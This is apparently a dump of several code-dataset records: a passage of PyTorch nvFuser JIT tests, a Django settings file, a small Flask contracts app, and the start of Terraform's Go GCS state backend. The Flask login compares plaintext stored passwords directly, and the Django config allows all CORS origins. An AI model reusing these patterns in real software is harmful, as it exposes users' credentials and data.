with nvfuser_singleton_fusion(True):
def t(x):
sizes : List[int] = []
return x.sum(sizes)
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
def test_int_tensor_input(self):
x = torch.randn(4, 2, device="cuda").to(dtype=torch.int)
with nvfuser_singleton_fusion(True):
def t(x):
return x.amax(dim=0)
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_to_boolean(self):
x = torch.randn(4, 2, device="cuda")
with nvfuser_singleton_fusion(True):
def t(x):
return x.to(dtype=torch.bool)
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x)
# TODO: revert disabled alias ops
@unittest.skipIf(True, "skipping this test since reshape is disabled now")
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_view_copy_graph_guard(self):
x = torch.randn(4, 2, 3, device="cuda").permute([1, 2, 0])
y = [4, 6]
with nvfuser_singleton_fusion(True):
def t(x, y : List[int]):
t1 = x + 1.0
t2 = t1 * 1.0
out = t2.reshape(y)
return out.relu()
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x, y)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_view_copy_graph_guard_double_fusion(self):
x = torch.randn(2, 2, 5, device="cuda")
w = torch.randn(5, 5, device="cuda")
with nvfuser_singleton_fusion(True):
def t(x, w):
o = x.view([4, x.size()[-1]])
o = torch.matmul(o, w)
o = o.view([2, 2, o.size()[1]])
return o
t_jit = torch.jit.script(t)
for i in range(3):
jit_o = t_jit(x, w)
o = t(x, w)
self.assertEqual(jit_o, o)
# TODO: revert disabled aten::view
# self.assertGraphContainsExactly(t_jit.graph_for(x, w), FUSION_GUARD, 2, consider_subgraphs=True)
self.assertGraphContainsExactly(t_jit.graph_for(x, w), FUSION_GUARD, 0, consider_subgraphs=True)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_input_output_passthrough(self):
def t(t0, t1, t2):
mask = t1.to(dtype=torch.bool)
masked_input = torch.where(t0, mask, t2)
return masked_input, mask
t_jit = torch.jit.script(t)
# stick to boolean inputs here; this avoids numerical differences due to
# our type promotion
x = torch.randn(4, 4, device='cuda').to(dtype=torch.bool)
y = torch.randn(4, 4, device='cuda').to(dtype=torch.bool)
z = torch.tensor(1.0, device='cuda').to(dtype=torch.bool)
jit_o = t_jit(x, y, z)
jit_o = t_jit(x, y, z)
o = t(x, y, z)
for oo, jit_oo in zip(o, jit_o):
self.assertEqual(oo.dtype, jit_oo.dtype)
self.assertEqual(oo, jit_oo)
self.assertGraphContains(t_jit.graph_for(x, y, z), FUSION_GUARD)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_pointwise_reference_tensor(self):
def t(input1, input2, scalar):
_unsafe_view = torch.ops.aten._unsafe_view(input1, [2, 4, 16])
add_ = torch.ops.aten.add_(_unsafe_view, input2)
gelu_ = torch.ops.aten.gelu(add_)
view_ = torch.ops.aten.view(gelu_, [8, 16])
mul_ = torch.ops.aten.mul(add_, scalar)
return [view_, mul_]
x = torch.randn(8, 16, device="cuda")
bias = torch.randn(16, device="cuda")
scalar = torch.ones(torch.Size([]), device="cuda")
t_jit = torch.jit.script(t)
for i in range(3):
jit_o = t_jit(x, bias, scalar)
o = t(x, bias, scalar)
self.assertEqual(jit_o, o)
self.assertGraphContains(t_jit.graph_for(x, bias, scalar), FUSION_GUARD)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
def test_native_batch_norm_backward(self):
grad_output = torch.randn(4, 2, 3, device="cuda")
input = torch.randn(4, 2, 3, device="cuda")
weight = torch.randn(2, device="cuda")
r_m = torch.randn(2, device="cuda")
r_v = torch.randn(2, device="cuda").abs()
save_mean = torch.randn(2, device="cuda")
save_invstd = torch.randn(2, device="cuda").abs()
with nvfuser_singleton_fusion(True):
def t(grad_out, input, weight, r_m, r_v, save_mean, save_invstd, train: bool, eps: float, mask: List[bool]):
return torch.ops.aten.native_batch_norm_backward(grad_out, input, weight, r_m, r_v, save_mean,
save_invstd, train, eps, mask)
t_jit = torch.jit.script(t)
for i in range(4):
jit_o = t_jit(grad_output, input, weight, r_m.clone(), r_v.clone(),
save_mean, save_invstd, True, 1e-5, [True, True, True])
ref_m = r_m.clone()
ref_v = r_v.clone()
jit_o = t_jit(grad_output, input, weight, r_m, r_v, save_mean, save_invstd, True, 1e-5, [True, True, True])
o = t(grad_output, input, weight, ref_m, ref_v, save_mean, save_invstd, True, 1e-5, [True, True, True])
for oo, jit_oo in zip(o, jit_o):
self.assertEqual(oo.dtype, jit_oo.dtype)
self.assertEqual(oo, jit_oo)
self.assertEqual(ref_m.dtype, r_m.dtype)
self.assertEqual(ref_m, r_m)
self.assertEqual(ref_v.dtype, r_v.dtype)
self.assertEqual(ref_v, r_v)
self.assertGraphContains(t_jit.graph_for(grad_output, input, weight, r_m.clone(), r_v.clone(), save_mean,
save_invstd, True, 1e-5, [True, True, True]), FUSION_GUARD)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_contiguous_on_broadcasted(self):
x = torch.randn(4, 1, device="cuda")
y = torch.randn(4, 128, device="cuda")
with nvfuser_singleton_fusion(True):
def t(x, y):
t1 = x.expand([4, 128])
t2 = t1 * y
return t2
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x, y)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_skip_parser(self):
x = torch.randn(4, 12, device="cuda")
with nvfuser_singleton_fusion(True):
def fn(x):
t1 = x + 1.0
return t1.relu()
fn_jit = torch.jit.script(fn)
self._run_helper(fn_jit, fn, x)
# add node should have been merged into fusion
self.assertGraphContains(fn_jit.graph_for(x), FUSION_GUARD)
self.assertGraphContainsExactly(fn_jit.graph_for(x), 'aten::add', 0)
# flips skip parse for `aten::add`, following fusion should skip the
# add node
self.assertFalse(torch._C._jit_set_nvfuser_skip_node_kind("aten::add", True))
def fn_1(x):
t1 = x + 2.0 # change const value so we'll not reuse plan
return t1.relu()
fn_1_jit = torch.jit.script(fn_1)
self._run_helper(fn_1_jit, fn_1, x)
# add node should have been excluded from fusion
self.assertGraphContains(fn_1_jit.graph_for(x), FUSION_GUARD)
self.assertGraphContainsExactly(fn_1_jit.graph_for(x), 'aten::add', 1)
# flips skip parse for `aten::add`, next fusion should fuse add node
self.assertTrue(torch._C._jit_set_nvfuser_skip_node_kind("aten::add", True))
def fn_2(x):
t1 = x + 2.0 # change const value so we'll not reuse plan
return t1.relu()
fn_2_jit = torch.jit.script(fn_2)
self._run_helper(fn_2_jit, fn_2, x)
# add node should have been merged into fusion
self.assertGraphContains(fn_2_jit.graph_for(x), FUSION_GUARD)
self.assertGraphContainsExactly(fn_2_jit.graph_for(x), 'aten::add', 0)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_cuda_fusion_guard(self):
old_guard = torch._C._jit_set_nvfuser_guard_mode(True)
class ConvModule(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x):
return x.sin().sigmoid()
mod = ConvModule().to(device="cuda")
inputs = [torch.randn(20, 16, 50, 100, device="cuda", requires_grad=True)]
def reduce_scalar(temp):
return temp.sum()
scripted = torch.jit.script(mod)
with torch.no_grad():
scripted(*inputs)
res = scripted(*inputs)
reduce_scalar(res).backward()
torch._C._jit_set_nvfuser_guard_mode(old_guard)
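# The two tests below register a comparison callback through
# torch._C._jit_nvfuser_set_comparison_callback. Judging from the
# assertions, passing True as the first argument makes the callback receive
# both fused and unfused (fallback) outputs plus the fusion group IR, while
# passing False leaves the unfused output list empty.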
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_nvfuser_comparison_callbacks_with_fallback(self):
try:
fused_result = None
unfused_result = None
graph_ir = None
def callback(fused_outputs, unfused_outputs, graph_str):
nonlocal unfused_result
nonlocal fused_result
nonlocal graph_ir
unfused_result = unfused_outputs[-1]
fused_result = fused_outputs[-1]
graph_ir = graph_str
torch._C._jit_nvfuser_set_comparison_callback(True, callback)
def fn(x, y):
z = torch.add(x, y)
return torch.relu(z)
x = torch.rand((4, 4)).cuda() - 0.5
y = torch.rand((4, 4)).cuda() - 0.5
fn_s = torch.jit.script(fn)
fn_s(x, y)
fn_s(x, y)
fn_s(x, y)
expected = fn(x, y)
self.assertEqual(expected, fused_result)
self.assertEqual(expected, unfused_result)
FileCheck().check("aten::add").run(graph_ir)
finally:
torch._C._jit_nvfuser_clear_comparison_callback()
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_nvfuser_comparison_callbacks_without_fallback(self):
try:
fused_result = None
unfused_result = None
graph_ir = None
def callback(fused_outputs, unfused_outputs, graph_str):
nonlocal unfused_result
nonlocal fused_result
nonlocal graph_ir
if len(unfused_outputs) > 0:
unfused_result = unfused_outputs[-1]
fused_result = fused_outputs[-1]
graph_ir = graph_str
torch._C._jit_nvfuser_set_comparison_callback(False, callback)
def fn(x, y):
z = torch.add(x, y)
return torch.relu(z)
x = torch.rand((4, 4)).cuda() - 0.5
y = torch.rand((4, 4)).cuda() - 0.5
fn_s = torch.jit.script(fn)
fn_s(x, y)
fn_s(x, y)
fn_s(x, y)
expected = fn(x, y)
self.assertEqual(expected, fused_result)
self.assertEqual(None, unfused_result)
FileCheck().check("aten::add").run(graph_ir)
finally:
torch._C._jit_nvfuser_clear_comparison_callback()
@unittest.skipIf(not RUN_NVFUSER, "requires NVFuser")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_cuda_fusion_guard_backward(self):
old_guard = torch._C._jit_set_nvfuser_guard_mode(True)
inp = torch.randn(10, device="cuda", requires_grad=True)
grad = torch.randn(10, device="cuda")
def f(x):
a = x.cos().cos()
return a
scripted = torch.jit.script(f)
with profile(activities=[ProfilerActivity.CPU]) as prof:
for _ in range(5):
inp.grad = None
out = scripted(inp)
out.backward(grad)
# check that no fallback was triggered
self.assertEqual(prof.events().table().find("fallback"), -1)
torch._C._jit_set_nvfuser_guard_mode(old_guard)
# TODO: generalize this
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
@unittest.skipIf(is_pre_volta(), "reduction not supported in pre volta device")
def test_inf_quick_patch(self):
inputs = [torch.tensor([-float('inf'), float('inf'), 4.0], device="cuda"),
torch.tensor([1.0, float('inf'), 4.0], device="cuda"),
torch.tensor([-float('inf'), -1.5, 4.0], device="cuda"),
torch.tensor([1.0, -3.0, float('nan')], device="cuda"),
torch.tensor([-float('inf'), -float('inf'), -float('inf')], device="cuda"),
torch.tensor([float('inf'), float('inf'), float('inf')], device="cuda"),
torch.tensor([float('nan'), float('nan'), float('nan')], device="cuda")]
def fn_amax(x):
return x.amax(dim=0)
def fn_amin(x):
return x.amin(dim=0)
def fn_add_nan(x):
return x.relu() + float('nan')
def fn_add(x):
return x + 1.0
with nvfuser_singleton_fusion(True):
for t in [fn_amax, fn_amin, fn_add, fn_add_nan]:
for x in inputs:
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_clamp(self):
x = torch.tensor([1., float('inf'), 2., float('nan'), float('-inf')], device="cuda")
def clamp_max(x):
return x.clamp(max=1.5)
def clamp_min(x):
return x.clamp(min=1.5)
def clamp_min_max(x):
return x.clamp(min=1., max=3.)
with nvfuser_singleton_fusion(True):
for t in [clamp_max, clamp_min, clamp_min_max]:
t_jit = torch.jit.script(t)
self._run_helper(t_jit, t, x)
class TestPassManagerCudaFuser(JitTestCase):
def setUp(self):
super().setUp()
if RUN_NVFUSER:
self.is_enabled = torch._C._jit_set_nvfuser_enabled(False)
def tearDown(self):
if RUN_NVFUSER:
torch._C._jit_set_nvfuser_enabled(self.is_enabled)
super().tearDown()
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
def test_context_manager_test(self):
x = torch.randn(4, 8, dtype=torch.float, device="cuda")
y = torch.randn(4, 8, dtype=torch.float, device="cuda")
with torch.jit.fuser('fuser2'):
with torch.jit.fuser('fuser2'):
def t1(x, y):
o = x + y
o = o + 2.0
return o
t_jit = torch.jit.script(t1)
t_jit(x, y)
t_jit(x, y)
self.assertGraphContains(t_jit.graph_for(x, y), FUSION_GUARD)
def t2(x, y):
o = x + y
o = o + 3.0
return o
t_jit_2 = torch.jit.script(t2)
t_jit_2(x, y)
t_jit_2(x, y)
self.assertGraphContains(t_jit_2.graph_for(x, y), FUSION_GUARD)
def t3(x, y):
o = x + y
o = o + 4.0
return o
t_jit_3 = torch.jit.script(t3)
t_jit_3(x, y)
t_jit_3(x, y)
self.assertGraphContainsExactly(t_jit_3.graph_for(x, y), FUSION_GUARD, 0)
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
def test_register_fuser(self):
self.assertFalse(torch._C._jit_set_nvfuser_enabled(True))
self.assertTrue(torch._C._jit_nvfuser_enabled())
self.assertTrue(torch._C._jit_set_nvfuser_enabled(True))
self.assertTrue(torch._C._jit_nvfuser_enabled())
self.assertTrue(torch._C._jit_set_nvfuser_enabled(False))
self.assertFalse(torch._C._jit_nvfuser_enabled())
@unittest.skipIf(RUN_CUDA, "Testing on CPU only")
def test_register_fuser_cpu(self):
with self.assertRaises(RuntimeError):
torch._C._jit_set_nvfuser_enabled(True)
torch._C._jit_set_nvfuser_enabled(False)
@unittest.skipIf(not RUN_CUDA, "requires CUDA")
@unittest.skipIf(not TEST_WITH_ROCM, "ROCM test only")
def test_register_fuser_rocm(self):
with self.assertRaises(RuntimeError):
torch._C._jit_set_nvfuser_enabled(True)
torch._C._jit_set_nvfuser_enabled(False)
# See TestNNCOpInfoParent
class TestCudaFuserOpInfoParent(JitCommonTestCase):
pass
class TestCudaFuserOpInfo(TestCudaFuserOpInfoParent):
def setUp(self):
super(TestCudaFuserOpInfoParent, self).setUp()
if RUN_NVFUSER:
self.cuda_fuser_options = CudaFuserTestOptions()
# enables guard mode since tracing could change graph to violate guard.
torch._C._jit_set_nvfuser_guard_mode(True)
self.nvfuser_single_node_mode = torch._C._jit_set_nvfuser_single_node_mode(True)
def tearDown(self):
if RUN_NVFUSER:
self.cuda_fuser_options.restore()
torch._C._jit_set_nvfuser_single_node_mode(self.nvfuser_single_node_mode)
super(TestCudaFuserOpInfoParent, self).tearDown()
@slowTest
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@ops(op_db, dtypes=OpDTypes.supported)
def test_nvfuser_correctness(self, device, dtype, op):
variant_sample_pairs = get_traced_sample_variant_pairs(device, dtype, op)
for variant, sample in variant_sample_pairs:
trace = create_traced_fn(self, variant, cache_traced_fn=True)
ref = variant(*clone_inputs((sample.input, *sample.args)), **sample.kwargs)
trace(*clone_inputs((sample.input, *sample.args)), **sample.kwargs)
val = trace(*clone_inputs((sample.input, *sample.args)), **sample.kwargs)
self.assertEqual(ref, val, exact_layout=True)
# Note: Clearing CU after NVFuser tests
# https://github.com/pytorch/pytorch/issues/35600
# each torch.jit.trace adds state to the _python_cu compilation unit
# since this test traces a lot of functions, out-of-memory can occur
# if the CU is not cleared.
torch.jit._state._python_cu.drop_all_functions()
@slowTest
@unittest.skipIf(not RUN_NVFUSER, "requires CUDA")
@unittest.skipIf(GRAPH_EXECUTOR != ProfilingMode.PROFILING,
"Requires fusion optimization pass to be effective")
@ops(op_db, allowed_dtypes=(torch.float16, torch.bfloat16, torch.float32,
torch.float64, torch.complex64, torch.complex128))
def test_nvfuser_extremal_values(self, device, dtype, op):
variant_sample_pairs = get_traced_sample_variant_pairs(device, dtype, op)
def _get_extremal_tensor(x, val, dtype):
if x.dtype != dtype:
return x
return torch.full_like(x, val)
def _get_extremal_input(x, val, dtype):
if isinstance(x, torch.Tensor):
return _get_extremal_tensor(x, val, dtype)
elif is_iterable_of_tensors(x):
return [_get_extremal_tensor(y, val, dtype) for y in x]
return x
def _get_extremal_sample(sample: SampleInput, val, dtype):
extremal_sample = SampleInput(
input=_get_extremal_input(sample.input, val, dtype),
args=[_get_extremal_input(x, val, dtype) for x in sample.args],
kwargs={k: _get_extremal_input(v, val, dtype) for k, v in sample.kwargs.items()},
)
return extremal_sample
def _get_extremal_samples(sample: SampleInput, dtype):
vals = [float('inf'), float('-inf'), float('nan')]
if dtype.is_complex:
complex_vals = itertools.product(vals, vals)
vals = list(map(lambda x: complex(*x), complex_vals))
for val in vals:
yield _get_extremal_sample(sample, val, dtype)
variant_sample_pairs = get_traced_sample_variant_pairs(device, dtype, op)
for variant, sample in variant_sample_pairs:
trace = create_traced_fn(self, variant, cache_traced_fn=True)
trace(*clone_inputs((sample.input, *sample.args)), **sample.kwargs)
trace(*clone_inputs((sample.input, *sample.args)), **sample.kwargs)
for extremal_sample in _get_extremal_samples(sample, dtype):
try:
with freeze_rng_state():
ref = variant(*clone_inputs((extremal_sample.input, *extremal_sample.args)),
**extremal_sample.kwargs)
except (torch._C._LinAlgError, RuntimeError, ValueError):
# if eager errors out, then don't expect NVFuser to pass
continue
with freeze_rng_state():
val = trace(*clone_inputs((extremal_sample.input, *extremal_sample.args)),
**extremal_sample.kwargs)
self.assertEqual(val, ref, equal_nan=True, exact_device=True)
# See [Note: Clearing CU after NVFuser tests]
torch.jit._state._python_cu.drop_all_functions()
instantiate_device_type_tests(TestCudaFuserOpInfo, globals(), only_for=("cuda"))
if __name__ == '__main__':
run_tests()
|
[] |
[] |
[
"PYTORCH_NVFUSER_DISABLE_FALLBACK",
"PYTORCH_NVFUSER_DISABLE_FMA",
"PYTORCH_NVFUSER_JIT_OPT_LEVEL",
"PYTORCH_NVFUSER_DISABLE_RNG_UNROLL",
"PYTORCH_NVFUSER_DISABLE_FASTMATH",
"PYTORCH_NO_CUDA_MEMORY_CACHING"
] |
[]
|
["PYTORCH_NVFUSER_DISABLE_FALLBACK", "PYTORCH_NVFUSER_DISABLE_FMA", "PYTORCH_NVFUSER_JIT_OPT_LEVEL", "PYTORCH_NVFUSER_DISABLE_RNG_UNROLL", "PYTORCH_NVFUSER_DISABLE_FASTMATH", "PYTORCH_NO_CUDA_MEMORY_CACHING"]
|
python
| 6 | 0 | |
mastercode_films_api/settings.py
|
"""
Django settings for mastercode_films_api project.
Generated by 'django-admin startproject' using Django 4.0.2.
For more information on this file, see
https://docs.djangoproject.com/en/4.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/4.0/ref/settings/
"""
from django.core.management.utils import get_random_secret_key
from pathlib import Path
import environ
import os
# Initialise environment variables
env = environ.Env(
DEBUG=(bool, False)
)
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
environ.Env.read_env(BASE_DIR / '.env')
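# Illustrative .env contents consumed above (placeholder values, not taken from this project):
#   DEBUG=True
#   API_KEY=<TMDB API key>
#   SECRET_KEY=<long random string>
#   ALLOWED_HOSTS=localhost,127.0.0.1
#   DATABASE_URL=postgres://user:pass@localhost:5432/films
#   CACHE_URL=locmemcache://
#   REDIS_URL=redis://127.0.0.1:6379/1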
# API INFO TMDB
URL_DB = 'https://api.themoviedb.org/3'
API_KEY = env.str('API_KEY')
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/4.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env.str('SECRET_KEY', default=get_random_secret_key())
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env.bool('DEBUG', default=False)
ALLOWED_HOSTS = tuple(env.list('ALLOWED_HOSTS', default=[]))
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'api',
'rest_framework',
'corsheaders',
# 'frontend',
]
MIDDLEWARE = [
'corsheaders.middleware.CorsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mastercode_films_api.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR / 'build'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mastercode_films_api.wsgi.application'
# Database
# https://docs.djangoproject.com/en/4.0/ref/settings/#databases
if DEBUG:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
else:
DATABASES = {
# read os.environ['DATABASE_URL'] and raises
# ImproperlyConfigured exception if not found
#
# The db() method is an alias for db_url().
'default': env.db(),
# read os.environ['SQLITE_URL']
'extra': env.db_url(
'SQLITE_URL',
default='sqlite:///./db.sqlite3'
# default=f'sqlite:///'+ os.path.join(BASE_DIR, 'db.sqlite3')
)
}
CACHES = {
# Read os.environ['CACHE_URL'] and raises
# ImproperlyConfigured exception if not found.
#
# The cache() method is an alias for cache_url().
'default': env.cache(),
# read os.environ['REDIS_URL']
'redis': env.cache_url('REDIS_URL')
}
# Password validation
# https://docs.djangoproject.com/en/4.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/4.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/4.0/howto/static-files/
STATIC_URL = 'static/'
STATICFILES_DIRS = [BASE_DIR / 'build/static']
STATIC_ROOT = BASE_DIR / 'static'
CORS_ORIGIN_ALLOW_ALL = True
# Default primary key field type
# https://docs.djangoproject.com/en/4.0/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
|
[] |
[] |
[
"REDIS_URL",
"CACHE_URL",
"DATABASE_URL",
"SQLITE_URL"
] |
[]
|
["REDIS_URL", "CACHE_URL", "DATABASE_URL", "SQLITE_URL"]
|
python
| 4 | 0 | |
app.py
|
# Alexandre Nobuharu Sato, December 6, 2021, Ribeirão Pires - SP
import os
from flask import Flask, jsonify, render_template, request, redirect, session, flash
from flask_session import Session
from werkzeug.utils import redirect
from flask_migrate import Migrate
from flask_sqlalchemy import SQLAlchemy
from tempfile import mkdtemp
from helpers import brl, row2dict, apology, login_required
from werkzeug.exceptions import default_exceptions, HTTPException, InternalServerError
database_uri = 'postgresql+psycopg2://{dbuser}:{dbpass}@{dbhost}/{dbname}'.format(
dbuser=os.environ['DBUSER'],
dbpass=os.environ['DBPASS'],
dbhost=os.environ['DBHOST'],
dbname=os.environ['DBNAME']
)
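# The DBUSER, DBPASS, DBHOST and DBNAME variables must be exported before the app starts,
# e.g. (illustrative values): DBUSER=films DBPASS=secret DBHOST=localhost DBNAME=filmsdb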
app = Flask(__name__)
app.config.update(
SQLALCHEMY_DATABASE_URI=database_uri,
SQLALCHEMY_TRACK_MODIFICATIONS = False,
TEMPLATES_AUTO_RELOAD = True,
SECRET_KEY = os.environ["SECRET_KEY"],
# Configure session to use filesystem (instead of signed cookies)
SESSION_FILE_DIR = mkdtemp(),
SESSION_PERMANENT = False,
SESSION_TYPE = "filesystem"
)
Session(app)
# Ensure responses aren't cached
@app.after_request
def after_request(response):
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
response.headers["Expires"] = 0
response.headers["Pragma"] = "no-cache"
return response
# Custom filter
app.jinja_env.filters["brl"] = brl
# initialize the database connection
db = SQLAlchemy(app)
# initialize database migration management
migrate = Migrate(app, db)
from models import Contratos, ListaCNs, Usuarios # common for db interactions
@app.route("/login", methods=["GET", "POST"])
def login():
"""Log User in"""
# Forget any user_id
session.clear()
# User reached route via POST (as by submitting a form via POST)
if request.method == "POST":
if not (request.form.get("email") and request.form.get("senha")):
return apology("faltou preencher algum campo", 400)
email = request.form.get("email")
senha = request.form.get("senha")
user = Usuarios.query.filter_by(email=email).first()
if user and (user.senha.strip() == senha.strip()):
session["user_id"] = user.id
flash (f"Bem vindo de volta {user.nome}")
return render_template("index.html")
else:
flash ("email ou senha incorretos")
return render_template("login.html")
else:
return render_template("login.html")
@app.route("/logout")
def logout():
session.clear()
return redirect("/")
@app.route("/")
@login_required
def index():
flash("Site em construção")
return render_template("index.html")
@app.route("/api")
def api():
contratos = Contratos.query.all()
CONTRATOS = [row2dict(contrato) for contrato in contratos]
return jsonify(CONTRATOS)
# return jsonify(json_list = [i.serialize for i in contratos])
@app.route("/tabela")
@login_required
def tabela():
contratos = Contratos.query.all()
CONTRATOS = [row2dict(contrato) for contrato in contratos]
for contrato in CONTRATOS:
contrato["valor"] = brl(float(contrato["valor"]))
return render_template("tabela.html", contratos=CONTRATOS)
@app.route("/lancar", methods=["GET", "POST"])
@login_required
def lancar():
if request.method == "POST":
id = None
contrato = request.form.get("contrato")
fornecedor = request.form.get("fornecedor")
objeto = request.form.get("objeto")
valor = request.form.get("valor")
mes = request.form.get("mes")
lancamento = Contratos(id, contrato, fornecedor, objeto, valor, mes)
db.session.add(lancamento)
db.session.commit()
return redirect("/tabela")
else:
return render_template("lancar.html")
@app.route("/lista_cns")
@login_required
def lista_cns():
contratos = ListaCNs.query.all()
CONTRATOS = [row2dict(contrato) for contrato in contratos]
# for contrato in CONTRATOS:
# contrato["valor"] = brl(float(contrato["valor"]))
return render_template("lista_cns.html", contratos=CONTRATOS)
def errorhandler(e):
"""Handle error"""
if not isinstance(e, HTTPException):
e = InternalServerError()
return apology(e.name, e.code)
# Listen for errors
for code in default_exceptions:
app.errorhandler(code)(errorhandler)
|
[] |
[] |
[
"DBPASS",
"DBUSER",
"DBHOST",
"DBNAME",
"SECRET_KEY"
] |
[]
|
["DBPASS", "DBUSER", "DBHOST", "DBNAME", "SECRET_KEY"]
|
python
| 5 | 0 | |
vendor/github.com/hashicorp/terraform/backend/remote-state/gcs/backend.go
|
// Package gcs implements remote storage of state on Google Cloud Storage (GCS).
package gcs
import (
"context"
"encoding/base64"
"encoding/json"
"fmt"
"os"
"strings"
"cloud.google.com/go/storage"
"github.com/hashicorp/terraform/backend"
"github.com/hashicorp/terraform/helper/schema"
"github.com/hashicorp/terraform/httpclient"
"golang.org/x/oauth2"
"golang.org/x/oauth2/jwt"
"google.golang.org/api/option"
)
// Backend implements "backend".Backend for GCS.
// Input(), Validate() and Configure() are implemented by embedding *schema.Backend.
// State(), DeleteState() and States() are implemented explicitly.
type Backend struct {
*schema.Backend
storageClient *storage.Client
storageContext context.Context
bucketName string
prefix string
defaultStateFile string
encryptionKey []byte
}
func New() backend.Backend {
b := &Backend{}
b.Backend = &schema.Backend{
ConfigureFunc: b.configure,
Schema: map[string]*schema.Schema{
"bucket": {
Type: schema.TypeString,
Required: true,
Description: "The name of the Google Cloud Storage bucket",
},
"path": {
Type: schema.TypeString,
Optional: true,
Description: "Path of the default state file",
Deprecated: "Use the \"prefix\" option instead",
},
"prefix": {
Type: schema.TypeString,
Optional: true,
Description: "The directory where state files will be saved inside the bucket",
},
"credentials": {
Type: schema.TypeString,
Optional: true,
Description: "Google Cloud JSON Account Key",
Default: "",
},
"access_token": {
Type: schema.TypeString,
Optional: true,
DefaultFunc: schema.MultiEnvDefaultFunc([]string{
"GOOGLE_OAUTH_ACCESS_TOKEN",
}, nil),
